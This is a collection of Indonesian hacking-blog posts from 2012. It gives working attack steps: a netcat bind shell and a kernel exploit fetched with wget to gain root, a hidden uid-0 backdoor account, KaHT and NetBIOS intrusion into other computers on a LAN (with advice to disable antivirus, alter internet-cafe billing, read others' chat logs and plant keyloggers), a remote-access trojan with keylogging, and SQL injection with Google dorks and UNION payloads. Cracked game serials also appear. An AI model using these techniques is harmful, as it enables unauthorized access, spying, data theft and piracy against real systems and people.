Thursday, June 21, 2012

Cara Mendapatkan Akses Root Pada Server Linux

 
    Tulisan ini hanya untuk pembelajaran belaka terutama buat pada Admin Server. Dengan mengetahui tekhnik rooting yang dilakukan oleh defacer, diharapkan sang Admin bisa lebih meningkatkan keamanan pada servernya. Cyber4rt tidak bertanggung jawab atas apa yang terjadi setelah membaca tulisan ini!
Linux adalah sebuah sistem yang secure, tapi jangan lupa ini buatan manusia, pasti ada saja kelemahan dari sistem itu, entah karena si Admin yang kurang handal dalam konfigurasi atau memang telah di temukan bugs pada sistem itu. Itulah mengapa Developer Linux membuat versi update untuk memperbaiki bugs - bugs yang terdapat pada sistem itu.
Apa itu root pada Linux ?
Root adalah nama user atau account yang secara default memiliki akses penuh ke semua perintah dan file pada sistem mirip Unix operasi Linux atau lainnya.
Bagaimana tekhnik mendapatkan Root pada server Linux?
Untuk bisa mendapatkan root, langkah pertama yang harus dilakukan adalah mendapatkan user biasa. Ini bisa dilakukan dengan melakukan injection ke sebuah situs, tapi untuk mengetahui situs yang memiliki kelemahan maka biasanya defacer melakukan scanning situs - situs yang terdapat vurnerability di sistemnya. Metode yang digunakan bisa RFI (Remote File Inclussion), LFI (Local File Inclussion) dan masih banyak metode lain.
Q : bagaimana cara scanning-nya???
A : untuk bisa scanning anda bisa melakukan koneksi ke server IRC yang menyediakan bot untuk scanning situs yang memiliki vurnerability atau dengan memanfaatkan Google Dork
Q : kasi tau donk IRC servernya???
A : Googling...zzZzzzzZ
Di sini kita beranggapan bahwa defacer sudah memasuki sistem lewat teknik - teknik yang ada di atas. Sekarang backdoor sudah terpasang di server target dan siap di jalankan oleh netcat dengan perintah berikut:

./nc -lvp 5050  -e /bin/sh

kemudian dari komputer defacer menjalankan Netcat (harus sudah terinstall di komputer) dengan perintah berikut :

./nc -v ip_server_target  5050

Setelah itu defacer mengetik:
uname -a
Maka akan muncul hasilnya kira - kira seperti ini (contoh) :
Linux blackbox 2.6.18-194.8.1.el5.028stab070.2 #1 SMP Tue Jun 18 02:30:59 MSD 2010 x86_64 GNU/Linux
Bagian yang perlu diperhatikan adalah 2.6.18-194. Ini adalah versi Kernel dari Linux yang sedang di jalankan. 
Langkah selanjutnya yang akan dilakukan oleh sang defacer adalah mencari bugs pada kernel tersebut  di berbagai situs - situs exploiter/injector. Setiap kernel memiliki bugs tersendiri. Misalnya saja sang defacer telah mendapatkan exploit kernel tersebut, maka dilanjutkan dengan mengetikkan beberapa sintaks-nya sebagai berikut (contoh) :

wget http://www.SitusExploiter.com/2.6.18-194.tgz
tar -xvzf 2.6.18-194.tgz
cd 2.6.18-194
./2.6.18-194.sh

Setelah melakukan beberapa contoh sintaks di atas, maka defacer pastinya ingin mengetahui keberhasilan tekhnik mendapatkan akses root dengan mengetik:

id
atau
whoami

Jika hasilnya root maka anda telah berhasil merebut akses root pada server tersebut. Lihat contoh gambar:

Tekhnik Mendapatkan Root Pada Server Linux

Setelah mendapatkan akses root biasanya defacer menambahkan New User Root Account. Sebagai contoh untuk menambahkan akses root dengan user "Cyber4rt" gunakan perintah berikut:

adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M Cyber4rt

ket:
adduser : perintah dasar Linux untuk menambahkan user

-u 0 -o : set user menjadi dengan ID nol (0) root.

-g 0 : Set initial group dengan ID nol (0) root.

-G 0,1,2,3,4,6,10 : Set additional group ke:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel

-M : "home directory" tidak di create ke user.

Cyber4rt - User name of the new user account.

Untuk melakukan set password pada user yang telah kita buat, perintahnya :

passwd NamaUser

Demikian sedikit teknik yang dapat dilakukan untuk mendapatkan akses Root pada server Linux. Semoga bermanfaat bagi kita semua khususnya para Admin Server.

Wednesday, June 20, 2012

Angry Birds Seasons 2.4.1 Full Serial Number - Mediafire



Angry Birds Seasons 2.4.1 | 53.93 MB
info isalgames

Angry Birds Seasons 2.4.1 Full Serial Number angry birds is the latest game released by Rovio. On version 2.4.1 there is the addition of Piglantis episode, Cherry Blossom, Year Of The Dragon, Wreck of the Halls, Ham'o'ween, and other episodes.

Minimum System Requirements
  • OS Windows XP SP2 
  • RAM 512MB 
  • CPU 1 GHz 
  • Graphic OpenGL 1.3 compatible
  • Internet Connection required for activation
Instalasi :
  1. Install game
  2. Klik Activate full version (Disconnect Internet)
  3. Enter Serial Number: ISAL-GAME-FREE-FULL
  4. Enjoy

Angry Birds Seasons 2.3.0 - Mediafire

Angry Birds Seasons 2.3.0 - Mediafire

Angry Birds Seasons 2.3.0 - Mediafire

Angry Birds Seasons 2.3.0 - Mediafire




download games
password isalgames
www.isalgames.com

Angry Birds Rio 1.4.4 - Mediafire


Angry Birds Rio 1.4.4 | 8.26 MB
info isalgames
Game Angry Birds Rio 1.4.4 - Anda pasti tentunya sudah mengenal game lucu yang dibuat oleh Rovio ini..Game Angry Birds Rio 1.4.2 ini bergenre strategy dan mempunyai misi untuk melepaskan hewan yang terkurung dalam kandang..game ini ringan dimainkan di PC dan grafiknya yang bagus membuat banyak orang memainkan game ini


Minimum System Requirements

  • OS:Windows XP SP2

  • RAM 512 MB

  • Graphic OpenGL 1.3 compatible

 Instalasi :

  1. Install program
  2. Play game
  3. Enter serial number: ISAL-GAME-FREE-FULL
  4. Serial berlaku juga untuk reedem code


Show Screenshot
Angry Birds Rio 1.4.4 - Mediafire
Angry Birds Rio 1.4.4 - Mediafire
Angry Birds Rio 1.4.4 - Mediafire
download games
password isalgames
Password :
www.isalgames.com 

Angry Birds Space 1.2.0 - Mediafir

Mad Riders-SKIDROW
Angry Birds Space 1.2.0-SKIDROW
Angry Birds Space 1.2.0 | Publisher: Rovio Mobile | Developer: Clickgamer Media Chillingo | Genre: Strategy | Platform: PC | Size: 31.95 MB | Release Date: 06-06-2012 

Angry Birds Space is a popular strategy game. Following a giant claw kidnaps their eggs, the Angry Birds chase it into a wormhole and discover themselves floating inside a strange new galaxy??? encompassed by space pigs! Luckily the Angry Birds have super powers that belongs to them...
Angry Birds Space features 60 interstellar levels on planets as well as in zero gravity, causing spectacular gameplay including slow-motion puzzles to lightspeed destruction. With regular free updates, new in-app purchases, completely new birds, brand new superpowers, and a whole galaxy to explore, the night sky has stopped being the limit!
Minimum System Requirements
  • OS: Windows XP SP2
  • RAM 512 MB
  • Graphic OpenGL 1.3 compatible
Installation :
  1. Install program
  2. Play game 
  3. Enter serial number: ISAL-GAME-FREE-FULL

screens isalgames
Mad Riders-SKIDROW

Mad Riders-SKIDROW

Mad Riders-SKIDROW
download games
   passwordnya:   www.isalgames.com

Wednesday, June 13, 2012

Saturday, June 9, 2012

Perintah Command Prompt Untuk Jaringan Komputer


Walaupun sudah sedikit tertinggal, command prompt tetap banyak manfaatnya. Terlebih untuk keperluan pengecekan, Command Prompt biasanya mampu menghasilkan informasi yang lebih valid. Banyak sekali perintah Command Prompt, mulai dari yang standart yang sering digunakan pada windows sampai dengan Command Prompt yang bisa dimanfaatkan dalam jaringan. Command Prompt yang digunakan jaringan tentunya juga banyak dan mempunyai fungsi yang berbeda-beda. Apa saja Command Prompt yang sering atau dapat digunakan dalam jaringan ? Apa saja manfaat dan fungisnya ? Silahkan baca artikel berikut .
Untuk melakukan perintah-perintah tersebut Anda harus masuk ke Command Prompt ( Klik Start ->Run ->Ketik CMD )
  1. ipconfig /all
    Menampilkan informasi konfigurasi koneksi, misalnya Host Name, Primary DNS Type, Ethernet Adapter LAN.
  2. ipconfig /flushdns
    Menghapus DNS Cache
  3. ipconfig /release
    “Menghapus” semua koneksi IP Address.
  4. ipconfig /renew
    Membuat IP Address baru untuk adapter tertentu.
  5. ipconfig /displaydns
    Menampilkan DNS Cache.
  6. ipconfig /registerdns
    Melakukan refresh DNS dan meregister kembali koneksi DNS.
  7. ipconfig /showclassid
    Menampilkan informasi DHCP Class.
  8. ipconfig /setclassid
    Mengubah DHCP Class ID
  9. control netconnections
    Menampilkan Network Connection.
  10. nslookup
    Mengetahui alamat ip address dari nama domain yang di tuliskan
  11. netstat
    Menampilkan informasi koneksi TCP/IP yang sedang aktif.
  12. route
    Menampilkan local route.
  13. hostname
    Menampilkan nama komputer.
  14. ping
    Contoh: ping www.facebook.com
    Melakukan test koneksi ke situs www.finderonly.com.
    Semakin sedikit % loss-nya maka semakin baik koneksinya.
  15. tracert
    Menampilkan informasi IP Address route.

Cara Melacak IP ADDRESS dan REAL ADDRESS Seseorang

Dalam artikel ini Spyro akan membahas hal-hal berikut:

1. Melacak alamat IP suatu situs

2. Melacak Real Adress server suatu situs

3. Cara Mengetahui IP address lawan chatting kita

(:::::—– Pembahasan —–::::

1. Melacak alamat IP suatu situs Untuk mengetahui alamat IP suatu situs, kita dapat melakukan PING terhadap situs tersebut. Caranya: Masuk ke command Prompt dan ketikan PING WWW.SITUS-YANG-DILACAK.COM lalu tekan enter. Maka akan muncul alamat Ip situs tersebut.

2. Melacak Lokasi server (real address) suatu situs Kita dapat melacak lokasi server suatu situs hanya dengan mengetahui alamat situsnya saja. Coba anda buka www.domainwhitepages.com Tinggal masukkan IP address situs tadi atau masukkan alamat situsnya dan anda akan mendapatkan info lengkap tentang server dari situs tersebut diantaranya adalah lokasi negara dan kota.

3. Melacak IP address lawan chatting kita Saat kita menggunakan Yahoo messenger, sebenarnya kita bisa mengetahui alamat IP dari lawan chatting kita. Caranya: :: Kirimkan suatu file pada lawan chat kita. :: Lalu masuklah ke Command Prompt (MSDOS) dan ketikkan NETSTAT -N lalu tekan enter, maka alamat IP lawan chatting anda (yang telah anda kirimi file tadi) akan muncul beserta port yang digunakan untuk pengiriman file. :: Untuk mengetahui lokasi lawan chatting anda (real address) seperti ia berada di kampus atau di warnet mana, tinggal anda chek di www.domainwhitepages.com dengan mempergunakan alamat IP yang anda dapatkan.

*Ingin menggunakan YM untuk beberapa user id di komputer yang sama? Anda bisa menggunakan software dan juga bisa dengan trik di bawah ini:

1. Start > Run…> regedit

2. Buka HKEY_CURRENT_USER > Software > yahoo > pager > test

3. Pada sebelah kanan, klik kanan > New > DWORD value

4. Beri nama Plural tekan enter 2 kali dan berikan nilai 1

5. Pastikan YM anda telah dimatikan, jalankan YM dan login secara biasa.

6. Kalau masih tidak bisa coba lagi step ke-5, kalau masih tidak bisa RESTART Tutorial Hacker Part 2 :

Melacak ip addreas di yahoo Mesengger dan mesengger lainnya Banyak para Newbie tidak tahu cara menampilkan ip addreas teman chatnya di Yahoo Messenger, AOL dan lainnya, memang untuk melakukannya kita butuh triks, berbeda dengan IRC yang tinggal di whois aja, baik langsung saja kita memulai tutorialnya, pertama-tama kirimkankan file apa saja yang anda punya ke teman chatting anda dimana ini fungsinya sebagai timing waktu agar anda punya waktu untuk mengetikkan perintah-perintah untuk menampilkan ip addreas teman chat anda, disarankan diatas 600kb, lebih besar itu lebih bagus karena itu akan menyebabkan waktu anda lebih banyak.

1.Segera buka MS-DOS anda, lalu ketikkan netstat -n lalu akan tampil ip teman chat anda, misalkan saja muncul tampilan sebagai berikut : 202.133.80.45 : 5000+++ ->> ip ini ( 202.133.80.45) ternyata setelah dicek itu milik Graha Net, nah ahkirnya ketahuan tuh si pemakai messenger di warnet mana, nah kalau 5000+ itu adalah portnya yang dikirimin file ama anda. Tujuan dari tutorial ini bahwa segala macam komunikasi diinternet tanpa penggunaan proxy dan semacamnya masih dapat dilacak dengan begitu mudahnya, sehingga gue mengingatkan untuk penggunaan proxy anonymous setiap anda berselancar di internet jika anda benar-benar ingin mengurangi resiko dari berbagai jenis pelacakan.

2. Cara masuk ke DOS pada Windows XP yang serba dikunci Banyak warnet yang membatasi akses gerak kita di Windows seperti fasilitas DOS, Windows Explorer, setting dan sebagainya dalam keadaan tidak dapat kita sentuh, huh, emang nyebelin kalo kita bener-bener perlu akses ini Gue punya jawaban Cara masuk di DOS pada Windows XP yang serba di lock fasilitasnya :

1. Pada icon dalam dekstop atau start menu di klik kanan, lalu pilih properties

2. Di properties pilihlah "find target…"

3. Muncul Window lalu pilih search diatas

4. Pada Search pilihlah "All Files and folders"

5. Lalu cari file "cmd.exe" di windows

6. Jika di temukan maka jalankan file cmd.exe.

7. Dengan menjalankan file cmd.exe maka anda telah masuk ke dos Jika ternyata penguncian benar-benar total maka anda dapat mengubah registry windows melalui pembuatan file *.reg dengan notepad / word pad, kemudian anda jalankan file *.reg tersebut, cara untuk membuatnya ada dihalaman ini juga. Tujuan dari tutorial ini agar kita dapat lebih banyak bergerak leluasa diwarnet-warnet yang keamanannya terlalu dilindungi sehingga membuat kita tidak bisa berbuat banyak di komputer tersebut.

3. Menembus fasilitas umum windows yang terlalu dibatasi Menjengkelkan jika fasilitas MS-DOS, RUN, Find dan sebangsanya di hilangkan dari desktop di komputer warnet, biar ga terlalu BT, kita tembus aja pakek cara ini

1. Masuk ke Notepad / Wordpad / Ms Word

2.Laluketik dibawah ini REGEDIT4 [HKEY_CURRENT_USER\""SOFTWARE\""Microsoft\""Windows\""CurrentVersion\""Policies\""System] "DisableRegistryTools"=dword:00000001 [HKEY_CURRENT_USER\""SOFTWARE\""Microsoft\""Windows\""CurrentVersion\""Policies\""Explorer] "NoRun"=dword:00000000

3. Simpanlah di dengan nama file berekstensi *.reg lalu jalankan file *.reg yang anda buat tadi lalu anda restart Tujuan dari tutorial ini untuk para netter yang merasa kesal dengan komputer warnet, kantor atau sebagainya yang dimana warnet, kantor atau lainnya melakukan pembatasan hak aksesnya terlalu berlebihan terhadap komputer yang kita gunakan.

4. Cara masuk di komputer lain lewat DOS (Windows XP / 2000) Anda ingin masuk dikomputer teman anda dalam sebuah LAN ? bisa melihat seluruh isi harddisk teman anda, membuat directory, membuat file, mendelete file atau apa saja ? itu mudah, semua caranya ada disini.

1.Pertama-tama anda harus tahu 2 program penting lalu downloadlah yaitu internet Maniac (Internet Maniac.exe) … Download Interenet Maniac Berfungsi untuk mengetahui ip addreas client melalui computer name / hostname KaHT (KaHt.exe) … Download program hacker KaHT Berfungsi sebagai program untuk menerobos ke computer server atau client Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe Pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara. Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe Setelah 2 program diatas di download maka ekstractlah dahulu program tersebut, entah pake WINZIP atau pake apa. Kalo udah di extract lalu pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara. Untuk Windows XP Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu pilih A computer on the Network lalu langsung klik search maka akan segera muncul computer-komputer yang terkoneksi dalam jaringan. Untuk Windows 95/98/Me/2000 (kalau anda menemukan open port 135 di OS ini) Cara Pertama Masuk ke Start Lalu Search Lalu For Files or Folders lalu pada menu Search for other item pilihlah computers, lalu akan muncul Search for computer, maka langsung klik Search Now maka nama-nama computer akan muncul (Alternatif cara yang cepat dapat mengklik My Network Place / Network Neighboure saja) Setelah loe dapetin sasaran computer yang mau di masukin / diremote maka loe langsung aja jalankan program Internet Maniac Masuklah ke Host Lookup lalu ketikkan nama computer / hostname lalu klik resolve, disini anda akan mendapat alamat ip computer tersebut. Dengan nomor ip ini maka anda sudah mengetahui sasaran computer yang akan di masuki. Setelah itu selesai maka kita tinggalkan program Internet Maniac, kita akan berlanjut dengan program KaHT, program ini akan didetect sebagai Trojan oleh antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau terdetect, kalau perlu del aja antivirusnya, satu lagi, program KaHT bekerja dalam MS-DOS Mode jadi disini kemampuan anda menggunakan DOS sangat penting, tanpa kemampuan DOS maka anda tidak akan bisa banyak berbuat. Cara masuk DOS Mode Untuk Windows XP : Masuklah ke Start, All programs, Accessories lalu Command Prompt Untuk Windows 95/98/Me/NT/2000 Masuklah ke Start, Programs, Accessories lalu MS-DOS Prompt Setelah berhasil masuk DOS maka masuklah di directory program KaHT, masa seh bisa lupa tadi program diextract dimana, hehe, (Misal tadi di extract di C:\""KaH) maka ketikkan "CD\""KaHT" dan seterusnya. Jika sudah, ini saatnya? Ketikkan "KaHT sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran. kalau bingung bisa begini : "KaHT Ip1 ip2" ip1 : ip awal yang discan ip2 : ip terahkir yang discan Misalnya tadi ip-nya 192.168.0.1 setelah di detect pakek Internet Maniac tadi itu lho. Maka ketikkan saja "KaHT 192.168.0.0 192.168.0.1" lalu enter aja Nah disini nanti program akan bekerja otomatis. Setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka anda akan otomatis di computer tujuan / sasaran, untuk lebih persisnya anda akan berada di "c:\""windows\""system" milik komputer tujuan / sasaran setelah pen-scan-an selesai. Anda bisa bebas di computer sasaran, mau edit atau di delete pun bisa, hehe Nah kalo udah begini kita bisa berkreasi : Pingin biaya warnet kita lebih murah ? gampang masuk aja di billing server, ketik Time, ganti aja waktunya, tapi jangan banyak-banyak apalagi minus nanti ketahuan ama operator warnetnya, hehe. Memata-matai anak yang sedang chatting pakek MiRC di satu warnet / kampus / kantor / lainnya, cari program MiRC yang digunakan dalam computer tersebut, biasanya seh di C:\""Program Files\""MiRC, buka file MiRC.INI, lalu Log IRC di On kan saja dan kalo mau lihat isi chattingan teman kita itu cukup lewat "/logs" maksudnya kalau tadi di C:\""program Files\""MiRC program MiRCnya maka cukup masuk aja di C:\""Program Files\""MiRC\""Logs nanti disitu ada file-file log hasil chattingan dia walaupun dia sedang online tetep aja terekam, hehe, kalo mau mastiin dia makek nick apa, gampang banget bisa jalanin aja MiRCnya atau periksa di MiRC.INI, gampangkan. Apalagi nih, Bikin computer itu rusak, lebih baik jangan, tapi sebenere bisa lho, delete aja file-file systemnya, hehe. Diatas cuman kreasi dikit aja, loe bisa aja memanfaatkannya jauh lebih bermanfaat dari pada diatas Tujuan dari tutorial ini untuk anda yang sering menggunakan komputer dengan Windows 2000 dan XP dijaringan agar lebih waspada terhadap berbagai tindakan usil dari pihak-pihak yang tidak bertanggung jawab.. 5.Membuat akses administrator Windows untuk kita lewat komputer lain Kita ingin membuat administrator Windows XP/2000 di komputer lain melalui LAN ? sangat mudah, caranya masuklah ke komputer tujuan dengan program kaht yang sudah diajarkan diatas, lalu kita akan mencoba beberapa trik. Melihat akses guest dan administrator di Windows Ketik : net user Melihat aktif tidaknya guest di Windows Ketik : net user guest Membuat akses guest menjadi Administrator dengan perintah : Ketik : net localgroup Administrators Guest /add Membuat akses adminstrator sendiri :

1. Ketik : net user /add

2. Ketik : net localgroup Administrators /add Menghapus akses administrator Ketik : net localgroup Users /delete 1. Cara mengetahui password administrator Windows - Download Proactive Windows Security Explorer

http://dl.winsite.com/files/439/ar2/win95/netutil/maniac.zip
http://evalsoftware.atelierweb.com/awrc62.zip

Cara Instal Themes

Themes bisa dianggap sebagai “kulit” untuk tampilan weblog, kulit tersebut dapat saja berganti-ganti tanpa merubah isi dari weblog tersebut. Biasanya di script WP yang kita instal sudah ada bawaan themes standar dan klasik, tapi bisa kog kita ambil dari kontibutor-kontributor themes, seperti :

Upload Themes
  1. Pilih dan download themes yang diinginkan, kemudian extract file-filenya dengan memperhatikan struktur bawaannya, kalau perlu baca readme atau instruksi yang biasa tersedia dari pembuat themes.
  2. Upload file-file tersebut ke web server hostingan dengan menggunakan FTP Client, upload semua isi dari folder themes di dalam directory bawaan WP yaitu dibagian wp-content/themes, jadi misalnya folder themes yang diupload namanya “marron” maka nantinya akan terbentuk directory wp-content/themes/marron disana.
Mengaktifkan Themes
Sebelum bisa tampil, themes harus diaktifkan terlebih dahulu, pastikan semua filenya sudah diupload ke directory wp-content/themes/
  1. Log in ke Admin Panel, pilih menu Presentation
  2. Pilih themes baru yang gambarnya sudah tampil di panel tersebut dengan mengkliknya,
  3. Sekarang theme pilihan sudah aktif, bisa di lihat dengan meng-klik “View Site” di bagian atas panel.
Image-image bawaan, warna background dan juga templatenya bisa dimodifikasikan sesuai selera kita, tapi sebaiknya demi menghormati si pencipta themes, link menuju ke situs author tidak perlu dihapus.
Untuk edit themes dari dalam admin panel, lihat di posting ini

Cara Edit / Mengganti Template WordPress

Mungkin para pengguna wordpress pernah merasa kesal ketika akan mengganti atau mencoba merubah template wordpress tetapi diharuskan membayar dulu kira2 sebesar $15. Tapi ternyata ada cara supaya kita bisa mengedit atau mengotak-atik template wordpress dengan tanpa mengeluarkan dana sepeserpun alias gratis. Mau tahu caranya? …
Syaratnya yaitu kamu harus memiliki domain dan hosting terlebih dulu. Untuk domain kamu bisa memakai domain gratis dari co.cc atau jika pingin domain .com/.net/.org km bisa membeli domain di dodoldomain.com. Selain domain kamu juga harus memmiliki hosting. Kamo bisa memakai hosting gratis di 000webhost atau bisa juga beli hosting murah di superinhost.com

Langkah awalnya yaitu kita harus mensetting domain dan hosting kita. Bagi yang belum tahu caranya silahkan BACA TUTORIAL INI. Langkah berikutnya yaitu kita cari atau download template wordpress yang ada dipasaran, dan tentunya cari yang gratisan dong. Coba cari lewat google dengan memakai kata kunci misal “Free Template wordpress” atau “Free WordPress Themes” dll. Biasanya hasil downloadnya akan berupa file “zip” atau “rar”. Extract dulu file tersebut sehingga menjadi folder yang didalamnya terdapat beberapa file.
Langkah berikutnya yaitu login ke cpanel hosting kamu. kemudian pilih “File Manager”. Kemudian masuk ke folder “Public_html –> …wp-content\themes\”. Upload file-file yang sudah di ekstract tadi ke folder tersebut. Kemudian buka alamat “http://namadomainmu.com/wp-admin” untuk login ke wordpress administrator (Jangan lupa ganti namadomainmu.com dengan nama domainmu ya). Lalu pergi ke menu “Design –> Themes”. Nha maka disitu kamu akan menjumpai template yg telah kamu upload tadi. Untuk mengaktifkannya tinggal diklik aja template yg km suka kemudian “Activate”. Trus coba deh buka blog wordpress kamu. Gimana berhasil gak? …. Gampang kan…

Remote administrator dengan ProHat

PROHAT merupakan salah satu jenis RAT (Remote Administration Tools) yang banyak digunakan untuk mengambil alih sistem komputer. Tool yang dibuat oleh PRO Group, sekelompok komunitas Hacker dari Turki, dapat digunakan sebagai tool Hacking komputer didalam sebuah jaringan. Penggunaan PROHAT cukup sederhana, anda cukup memasukan IP (Internet Protocol) komputer yang menjadi target kemudian masuk melalui salah satu Port yang terbuka. Bagian tersulit adalah mencari Port mana yang terbuka. Namun anda bisa menggunakan beragam tool analisis jaringan seperti nMap, Ethercap, LookHost, dll.



Berikut fitur-fitur yang disediakan oleh PROHAT:


- Remote Control
- Melihat System Info, aplikasi yang berjalan dan Task Manager
- Menambah proses, file, atau mendownload file
- Admin FTP
- Memformat Hardisk (merusak Harddisk)
- Meremote download
- Menjalankan MS-DOS, Batch Script, VBScript
- Menambah Registry Entry
- Keylogger: Password Recording
- Menmapilkan Screnshots, melihat desktop windows langsung
- Mengirim pesan dan chatting
- Shutdown, Restart, Control Panel, IExplorer, Registry, Printer and Online Controls

DOWNLOAD PROHAT DARI SITUS RESMINYA
atau DOWNLOAD MIRROR LINK DISINI

Password: pro

Remote komputer dengan Netbios Hacking



Hacking menggunakan metode Netbios atau lebih dikenal dengan Netbios Hacking merupakan teknik hacking klasik yang bisa kita pelajari dan tidak salah untuk dipraktekkan. Hacking Netbios cocok diterapkan pada jaringan LAN, semisal warnet atau jaringan kantor.


Hal utama yang dibutuhkan dalam Netbios Hacking adalah IP Address. Ada berbagai tools dan sofware yang dapat digunakan untuk menscan IP Address yang sedang aktif pada jaringan lokal, misalnya Look at Lan, IP Scanner, dll. Pelajari penggunaanya disini.

Langkah-langkah Netbios Hacking :
  1. Buka command Prompt, atau pada run ketik cmd kemudian enter.
  2. Pada command prompt ketik netview \\ip_address, misalnya C:\>net view \\192.168.1.1
Jika tidak ada pesan error yang ditampilkan, coba dengan IP Address yang berbeda. Jika sukses tidak ada pesan error, lanjutkan dengan perintah yang lain dibawah ini.
C:\>net use C:\\192.168.1.100
C:\>net use D:\\192.168.1.100\SharedDocs
C:\>net use F:\\192.168.1.100\Myprint

Pada contoh-contoh di atas menunjukan beberapa perintah yang biasa digunakan. C:,D:, dan F: adalah drive yang biasa terdapat di komputer. Perintah pertama bertujuan untuk mengakses drive C. Perintah kedua (SharedDocs) digunakan untuk mengakses Dokumen yang di sharing sedangkan perintah ketiga (Myprint) dipakai untuk mengakses printer komputer yang akan diremote.

Jika tampil pesan "The commad completed successfully", berarti perintah yang dilakukan berhasil meremote komputer korban. Langkah selanjutnya tinggal mengobrak-abrik komputer korban, mencopy, menghapus data, memasukan virus, spyware, trojan atau keylogger.

Menarik bukan?... Hacking netbios dapat dijadikan awal kita memulai aktifitas hacking di jaringan. wew....

Catatan: Hacking netbios yang dapat dijalankan pada komputer yang tidak terlindungi oleh Firewall. Jadi jika Firewall komputer diaktifkan maka akan tampil pesan error. Stop dan coba dengan IP Address yang berbeda.

Selamat mencoba

Web Hacking dengan DVWA


Damn Vulnerable Web Application (DVWA) adalah kumpulan tool hacking web berbasis PHP/mySQL. DVWA dapat menjadi pilihan bagi hacking web pemula untuk mempelajari teknik web hacking dari awal. Beragam teknik serangan web hacking dapat diperoleh dari tool ini. Selain mudah digunakan, ringan dan lengkap, DVWA dijalankan melalui server local (localhost) menggunakan aplikasi WAMP/XAMP/LAMP dan lainya.


DVWA menyertakan beberapa tool web hacking seperti:

- SQL Injection
- XSS (Cross Site Scripting)
- LFI (Local File Inclusion)
- RFI (Remote File Inclusion)

- Command Execution
- Upload Script
- Login Brute Force


DOWNLOAD DVWA DISINI

Sql Injection Tutorial

SqLi Tutorial – Sql Injection Tutorial – Sql Injection Artikel – SQL Injection Article
Sqli (alias Sql Injection atau Structured Query Language Injeksi) adalah langkah pertama dalam entri untuk memanfaatkan atau hacking website. Hal ini mudah dilakukan dan merupakan titik dari awal yang bagus. Sayangnya tutorial yang sedikit rumit sehingga itulah sebabnya ane menulis ini. Sqli pada dasarnya hanyalah suntikan pertanyaan ke dalam database atau menggunakan query untuk mendapatkan bypass otorisasi sebagai sebuah admin.


Untuk Mencari Inject
Mencari SQLI sangat mudah,semua yang perlu ente2 lakukan adalah Googling . Hal pertama yang perlu ente2 lakukan adalah menemukan beberapa dorks

Code:

inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:read.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: mysql_num_rows()

Lebih lengkap, silakan dicari di Google Dorknya :)

PART 1

Pilih salah satu dorks dan menambahkan inurl: sebelum
(Jika mereka belum memiliki itu) dan kemudian salin dan sisipkan
ke google. Pilih salah satu situs dari google dan chek 1-1.
Sebagai contoh url dari halaman ente berada mungkin terlihat seperti ini

Code:

http://www.example.com/index.php?id=3

untuk memeriksa adanya Bug MySQL tinggal tambahin “‘” di akhir URL
contoh
Code:

http://www.example.com/index.php?id=3'

tekan enter sampai ente2 mendapatkan ERROR
Mendapatkan Jumlah Kolom
Setelah ente menemukan situs yg udah di siapin ,langkah pertama yang perlu ente2 ambil adalah
untuk menemukan jumlah kolom. Cara termudah untuk melakukannya adalah
menggunakan pernyataan “order by”. Yang harus ente lakukan adalah meletakkan ORDER BY (angka) -
pada akhir url ente. Jadi seharusnya terlihat seperti ini.

Code:

http://www.example.com/index.php?id=3 ORDER BY (number)--

setelahnya ane ubah jadi bahasa inggris dah..
capek translatenya
wkwkwkwkwkwkwkwkwkw :P

Yuk kita lanjutkan ke order by 8– kamu akan mendapatkan sebuah error. Ini membuktikan bahwa table database hanya memiliki 7 kolom, ini dibuktikan bahwa ketika anda melakukan order by lebih dari 7, akan selalu error. Jika kamu memiliki memory yang kurang baik, silakan buka notepad & catat kolom-kolom yang anda temukan.
Menemukan kolom yang dapat di akses

Setelah kita mengetahui kolom yang ada di table database, sekarang kita akan mencari informasi & data apa yang bisa diambil dari sana.
Kita melakukan hal tersebut dengan menggunakan fungsi “UNION” “SELECT” dan NOMOR KOLOM. Kita selipkan seluruhnya dalam URL, seperti contoh berikut:

Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--

Jangan lupa untuk menyisipkan tanda “-” sebelum code dimulai, jadi sebagai contoh di atas kita selipka tanda “-” didepan angka “3“, nah setelah semua dilakukan, maka akan muncul table yang memiliki isi didalamnya. Catatlah nomor kolom table yang memiliki informasi di dalam database tersebut. Klo lupa, simpan dulu di notepad.
Finding MySQL Database Version
Sebelum kita melanjutkan hal ini, maka yang perlu kita ketahui adalah versi dari database.

URL nya adalah sebagai berikut:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--

Kita ganti angka “1” dengan  “@@version” untuk mengetahui informasi versi database, berikut contohnya:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+@@version,2,3,4,5,6,7--

Tekan enter, maka anda akan menemukan informasi database yang digunakan.
Hal ini biasanya bekerja pada versi database 5.* keatas.
Finding Database Names

Selanjutkan kita akan inject website untuk menemukan database names. Kita lakukan hal ini dengan mengganti “@@version
